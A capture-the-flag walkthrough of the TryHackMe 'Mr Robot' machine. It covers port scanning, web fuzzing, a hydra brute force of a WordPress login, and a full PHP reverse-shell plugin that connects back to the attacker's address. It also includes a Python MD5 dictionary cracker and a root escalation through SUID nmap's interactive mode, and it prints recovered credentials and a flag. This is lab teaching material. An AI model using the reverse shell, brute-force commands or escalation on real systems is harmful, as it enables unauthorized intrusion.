Mr Robot CTF

Operating system   Difficulty   Release date   Creator
Linux              Medium       -              ben & TryHackMe

Reconnaissance

We send an ICMP echo request (ping) to the target machine to confirm we have connectivity. A reply TTL close to 64 already suggests a Linux host, which is consistent with the ttl 63 nmap reports below.


Initial enumeration

We run a full TCP port scan with nmap to find which ports are open on the target (-sS SYN scan, -p- all 65535 ports, --open to report only open ports, -Pn to skip host discovery, -n to skip DNS resolution, --min-rate 5000 to keep it fast; -oG writes greppable output). A rate this high over a VPN link can drop replies, so anything that looks odd is worth re-scanning at a lower rate.

nmap -sS -p- --open -Pn -n --min-rate 5000 -oG openPorts -vvv 10.10.77.209
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-26 09:38 -03
Initiating SYN Stealth Scan at 09:38
Scanning 10.10.77.209 [65535 ports]
Discovered open port 80/tcp on 10.10.77.209
Discovered open port 443/tcp on 10.10.77.209
Completed SYN Stealth Scan at 09:39, 28.02s elapsed (65535 total ports)
Nmap scan report for 10.10.77.209
Host is up, received user-set (0.39s latency).
Scanned at 2025-03-26 09:38:38 -03 for 28s
Not shown: 65532 filtered tcp ports (no-response), 1 closed tcp port (reset)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE REASON
80/tcp  open  http    syn-ack ttl 63
443/tcp open  https   syn-ack ttl 63

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 28.11 seconds
           Raw packets sent: 131084 (5.768MB) | Rcvd: 565 (128.889KB)

We then run nmap's default scripts and version detection (-sCV) against the two open ports to identify the services and, where possible, their versions.

nmap -sCV -p80,443 -oN servicesScan 10.10.77.209
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-26 09:45 -03
Nmap scan report for 10.10.77.209 (10.10.77.209)
Host is up (0.23s latency).

PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.59 seconds

Initial exploitation

HTTP (80)

Apache hides its version (ServerTokens Prod or similar) and the certificate on 443 is a placeholder with CN www.example.com, so the banners tell us little. We move on to the web content over port 80.


We fuzz for web content with ffuf. Note that the entries starting with # in the results below are comment lines from the wordlist: the # begins a URL fragment, so each of them is really a request for / and returns the same 200 response of 1188 bytes as the empty-path entry. Passing -ic makes ffuf skip wordlist comments, and -fs 1188 would filter that response size.

ffuf -c -u http://10.10.77.209/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 200 -e .php

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.77.209/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Extensions       : .php 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 200
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

# directory-list-2.3-medium.txt [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 236ms]
images                  [Status: 301, Size: 235, Words: 14, Lines: 8, Duration: 254ms]
blog                    [Status: 301, Size: 233, Words: 14, Lines: 8, Duration: 242ms]
sitemap                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 317ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 442ms]
# Suite 300, San Francisco, California, 94105, USA..php [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 446ms]
#                       [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 451ms]
# Priority ordered case-sensitive list, where entries were found.php [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 451ms]
# This work is licensed under the Creative Commons.php [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 451ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/.php [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 451ms]
#.php                   [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 452ms]
#.php                   [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 452ms]
#                       [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 452ms]
# Copyright 2007 James Fisher.php [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 452ms]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 452ms]
# Copyright 2007 James Fisher [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 452ms]
#.php                   [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 454ms]
#.php                   [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 454ms]
# Attribution-Share Alike 3.0 License. To view a copy of this.php [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 455ms]
# or send a letter to Creative Commons, 171 Second Street,.php [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 457ms]
# on at least 2 different hosts.php [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 458ms]
# directory-list-2.3-medium.txt.php [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 463ms]
#                       [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 464ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 465ms]
#                       [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 471ms]
                        [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 471ms]
# Priority ordered case-sensitive list, where entries were found [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 471ms]
# This work is licensed under the Creative Commons [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 473ms]
# on at least 2 different hosts [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 473ms]
index.php               [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 476ms]
# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 475ms]
rss                     [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 891ms]
video                   [Status: 301, Size: 234, Words: 14, Lines: 8, Duration: 226ms]
login                   [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 1775ms]
0                       [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 3363ms]
feed                    [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 3358ms]
wp-content              [Status: 301, Size: 239, Words: 14, Lines: 8, Duration: 228ms]
image                   [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 3355ms]
atom                    [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 3186ms]
admin                   [Status: 301, Size: 234, Words: 14, Lines: 8, Duration: 231ms]
audio                   [Status: 301, Size: 234, Words: 14, Lines: 8, Duration: 224ms]
intro                   [Status: 200, Size: 516314, Words: 2076, Lines: 2028, Duration: 227ms]
css                     [Status: 301, Size: 232, Words: 14, Lines: 8, Duration: 225ms]
wp-login.php            [Status: 200, Size: 2606, Words: 115, Lines: 53, Duration: 3397ms]
wp-login                [Status: 200, Size: 2606, Words: 115, Lines: 53, Duration: 3424ms]
rss2                    [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 3358ms]
license                 [Status: 200, Size: 309, Words: 25, Lines: 157, Duration: 278ms]
wp-includes             [Status: 301, Size: 240, Words: 14, Lines: 8, Duration: 229ms]
js                      [Status: 301, Size: 231, Words: 14, Lines: 8, Duration: 226ms]
wp-register.php         [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 3383ms]
Image                   [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 3367ms]
wp-rss2.php             [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 3399ms]
rdf                     [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 3489ms]
page1                   [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 3410ms]
readme                  [Status: 200, Size: 64, Words: 14, Lines: 2, Duration: 236ms]
robots                  [Status: 200, Size: 41, Words: 2, Lines: 4, Duration: 228ms]
dashboard               [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 3339ms]
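As an added example that is not part of the original write-up, the following Python script parses ffuf's text output and removes the noise visible in the scan above: the wordlist-comment hits, the empty-path hit, and anything whose status/size/words/lines signature equals the catch-all page. The sample lines are copied from this scan; guessing the baseline from the most frequent signature is an assumption made here for the offline example, and in a real run you should calibrate against a random path (what ffuf -ac does) or pass the baseline in explicitly.

```python
import re
from collections import Counter

# One ffuf result line looks like:
#   wp-login.php  [Status: 200, Size: 2606, Words: 115, Lines: 53, Duration: 3397ms]
FFUF_LINE = re.compile(
    r"^(?P<path>.*?)\s*\[Status: (?P<status>\d+), Size: (?P<size>\d+), "
    r"Words: (?P<words>\d+), Lines: (?P<lines>\d+), Duration: (?P<ms>\d+)ms\]\s*$"
)

# Constructed sample: a handful of lines taken from the scan above, including the
# wordlist-comment noise and the hit for the empty path.
SAMPLE_FFUF = """\
# directory-list-2.3-medium.txt [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 236ms]
images                  [Status: 301, Size: 235, Words: 14, Lines: 8, Duration: 254ms]
# Copyright 2007 James Fisher [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 452ms]
#.php                   [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 452ms]
                        [Status: 200, Size: 1188, Words: 189, Lines: 31, Duration: 471ms]
wp-login.php            [Status: 200, Size: 2606, Words: 115, Lines: 53, Duration: 3397ms]
readme                  [Status: 200, Size: 64, Words: 14, Lines: 2, Duration: 236ms]
robots                  [Status: 200, Size: 41, Words: 2, Lines: 4, Duration: 228ms]
license                 [Status: 200, Size: 309, Words: 25, Lines: 157, Duration: 278ms]
"""


def parse_ffuf(text):
    """Parse ffuf's default text output into a list of hit dicts (banner lines are skipped)."""
    hits = []
    for line in text.splitlines():
        m = FFUF_LINE.match(line)
        if not m:
            continue
        hits.append({
            "path": m["path"].strip(),
            "status": int(m["status"]),
            "size": int(m["size"]),
            "words": int(m["words"]),
            "lines": int(m["lines"]),
        })
    return hits


def signature(hit):
    """The tuple ffuf's filters (-fc/-fs/-fw/-fl) operate on."""
    return (hit["status"], hit["size"], hit["words"], hit["lines"])


def baseline_signature(hits):
    """Guess the catch-all response as the most frequent signature among 200s.

    Assumption for this offline example only: a real run should request a
    random path and use that response as the baseline instead.
    """
    counts = Counter(signature(h) for h in hits if h["status"] == 200)
    return counts.most_common(1)[0][0] if counts else None


def filter_hits(hits, baseline=None):
    """Drop comment-line and empty-path requests and anything matching the baseline."""
    if baseline is None:
        baseline = baseline_signature(hits)
    kept = []
    for h in hits:
        # A path starting with '#' is a wordlist comment; the '#' opens a URL
        # fragment, so the request that actually went out was for '/'.
        if h["path"] == "" or h["path"].startswith("#"):
            continue
        if signature(h) == baseline:
            continue
        kept.append(h)
    return kept


if __name__ == "__main__":
    for h in filter_hits(parse_ffuf(SAMPLE_FFUF)):
        print(f'{h["path"]:<24} {h["status"]} {h["size"]}')
```

Run it on a saved scan with parse_ffuf(open("scan.txt").read()); the paths that survive filter_hits are the ones worth visiting by hand.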


The robots hit above is robots.txt (41 bytes). It lists two entries, key-1-of-3.txt and fsocity.dic; reading key-1-of-3.txt gives us the first flag.

073403c8a58a1f80d943455fb30724b9


We also download fsocity.dic (the file really is spelled that way on the server).

wget http://10.10.77.209/fsocity.dic


We brute-force the WordPress login with the dictionary we just downloaded. fsocity.dic is mostly duplicates (about 858,000 lines, of which only around 11,000 are unique), so we deduplicate it first; otherwise hydra would retry the same passwords over and over against a slow target. The username comes from WordPress itself: wp-login.php answers "Invalid username" for an unknown account but "The password you entered for the username ... is incorrect" for a valid one. Feeding the wordlist as usernames and keeping the entries that do not return "Invalid username" confirms elliot as a valid account, and the second message is the failure string hydra matches on.

cat fsocity.dic | sort -u > wordlist.txt


hydra -l elliot -P wordlist.txt 10.10.77.209 http-post-form "/wp-login/:log=^USER^&pwd=^PASS^:The password you entered for the username" -I -t 20


hydra finds a valid pair:

elliot:ER28-0652

With those credentials we log in at /wp-login.php and land in the WordPress dashboard as an administrator. An administrator can install plugins, and a plugin is just PHP that WordPress executes, so we take pentestmonkey's php-reverse-shell, add the plugin header WordPress needs in order to recognise it, and point $ip and $port at our listener (10.9.0.64 is the attacking machine's VPN address):

<?php
/**
* Plugin Name: WP Reverse Shell
* Author: D4redevil
*/

// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.9.0.64';  // CHANGE THIS
$port = 4444;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
    // Fork and have the parent process exit
    $pid = pcntl_fork();

    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }

    if ($pid) {
        exit(0);  // Parent exits
    }

    // Make the current process a session leader
    // Will only succeed if we forked
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }

    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
    // Check for end of TCP connection
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }

    // Check for end of STDOUT
    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }

    // Wait until a command is sent down $sock, or some
    // command output is available on STDOUT or STDERR
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    // If we can read from the TCP socket, send
    // data to process's STDIN
    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }

    // If we can read from the process's STDOUT
    // send data down tcp connection
    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }

    // If we can read from the process's STDERR
    // send data down tcp connection
    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
    global $daemon;  // without this the flag is never visible here and output is never suppressed
    if (!$daemon) {
        print "$string\n";
    }
}
?>

We save this as revshell.php and zip it, since the plugin uploader only accepts ZIP archives:

zip revshell.zip revshell.php


We start a netcat listener on the port set in the shell, then upload the ZIP under Plugins > Add New > Upload Plugin and activate it. Activation includes the plugin file, which runs the reverse shell and connects back to us.

nc -lnvp 4444


Enumeration / lateral movement

daemon -> robot

The shell arrives as the daemon user, the account Apache runs as on this box. We upgrade it to a proper TTY first, because su, which we need shortly, refuses to run without one:

python3 -c 'import pty; pty.spawn("/bin/bash")'

Enumerating the home directories, /home/robot contains password.raw-md5, which is world-readable and holds the robot user's password as an unsalted MD5 hash (the key file next to it is readable by robot only, so we need that account). An unsalted MD5 with no work factor falls to a dictionary attack in seconds and yields the plaintext:

robot:abcdefghijklmnopqrstuvwxyz
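As an added example that is not part of the original write-up, this Python script shows the dictionary attack on a raw, unsalted MD5 hash of the kind found above (the same thing john --format=Raw-MD5 or hashcat -m 0 do at scale). The user:hash line and the candidate list are constructed for the example; the digest is the RFC 1321 test vector for the 26 lowercase letters, which is exactly the password shown above, and the file-based helper is meant to be pointed at fsocity.dic or any other wordlist.

```python
import hashlib
import string

HEX = set(string.hexdigits.lower())

# Constructed input in "user:hash" form. The digest is MD5 of the 26 lowercase
# letters, one of the RFC 1321 test vectors, i.e. the password recovered above.
SAMPLE_HASH_LINE = "robot:c3fcd3d76192e4007dfb496cca67e13b"

# Small constructed candidate list standing in for a real wordlist.
SAMPLE_WORDS = ["password", "robot", "fsociety", "abcdefghijklmnopqrstuvwxyz"]


def parse_hash_line(line):
    """Split 'user:hexdigest' and check that the digest is a 32-hex-char MD5."""
    user, _, digest = line.strip().partition(":")
    digest = digest.lower()
    if len(digest) != 32 or not set(digest) <= HEX:
        raise ValueError(f"not a raw MD5 digest: {digest!r}")
    return user, digest


def md5_hex(text):
    """Hex MD5 of a UTF-8 string; no salt, no iterations, hence trivially crackable."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def variants(word):
    """Cheap mangling rules: as-is, capitalised, upper-cased, trailing digit."""
    yield word
    yield word.capitalize()
    yield word.upper()
    for d in range(10):
        yield f"{word}{d}"


def crack_md5(digest, words, mangle=True):
    """Dictionary attack on an unsalted MD5. Returns the plaintext or None."""
    target = digest.lower()
    for word in words:
        word = word.rstrip("\r\n")
        if not word:
            continue
        for candidate in (variants(word) if mangle else (word,)):
            if md5_hex(candidate) == target:
                return candidate
    return None


def crack_hash_file(hash_path, wordlist_path):
    """Crack every user:hash line in a file against a wordlist (e.g. fsocity.dic)."""
    with open(wordlist_path, encoding="utf-8", errors="replace") as fh:
        words = [w.rstrip("\r\n") for w in fh]
    results = {}
    with open(hash_path, encoding="utf-8") as fh:
        for line in fh:
            if not line.strip():
                continue
            user, digest = parse_hash_line(line)
            results[user] = crack_md5(digest, words)
    return results


if __name__ == "__main__":
    user, digest = parse_hash_line(SAMPLE_HASH_LINE)
    print(user, crack_md5(digest, SAMPLE_WORDS))
```

The point of the example is the asymmetry: because the hash has no salt and no cost factor, every candidate costs one MD5 computation, so even a naive loop over a few hundred thousand words finishes in seconds.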

We switch users with su robot and that password.

Privilege escalation

We find /usr/local/bin/nmap with the SUID bit set, and it is an old build (3.81). nmap versions from 2.02 up to 5.21 have an --interactive mode whose prompt accepts shell escapes, so running nmap --interactive and typing !sh at the prompt spawns /bin/sh with effective uid 0 thanks to the SUID bit (id shows euid=0(root)). Newer nmap builds no longer have --interactive, so check the version before relying on this.

References


Post-exploitation

With the root shell we read the last flag, key-3-of-3.txt in /root.
